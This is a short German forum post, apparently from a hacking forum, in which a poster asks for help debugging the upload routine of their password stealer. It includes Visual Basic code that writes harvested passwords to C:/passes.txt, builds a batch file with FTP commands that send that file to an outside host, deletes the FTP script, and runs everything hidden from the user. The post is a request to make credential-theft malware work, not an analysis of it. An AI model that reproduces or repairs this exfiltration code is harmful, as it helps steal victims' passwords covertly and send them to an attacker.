Hi,
Ich habe ein Problem mit dem Batch Upload.
Als erstes wird bei meinem stealer auf C:/passes.txt erstellt. So weit, so gut.
Anschließend folgt der Upload code:
Code:
Open "C:/abcde.bat" For Output As #1
Print #1, "@echo off"
Print #1, "echo OPEN " & host & "> nul > ftp.txt"
Print #1, "echo " & user & " > nul >> ftp.txt"
Print #1, "echo " & pw & " > nul >> ftp.txt" ' mal schauen ok?
Print #1, "echo put ""passes.txt"" > nul >> ftp.txt"
Print #1, "echo BYE > nul >> ftp.txt"
Print #1, "ftp -s:ftp.txt > nul"
Print #1, "del / f / q ftp.txt"
Close #1
Shell ("C:/abcde.bat"), vbHide 'also
End Sub
Bloß, nix ommt auf den FTP.
Wenn ich auf C:/ anschließend die abcde.bat ausführe, kommt alles auf dem FTP...
Habs mit timern, batch ping, mit allem probiert, geht einfach nicht
Weiß jmd wieso?
Danke im Vorraus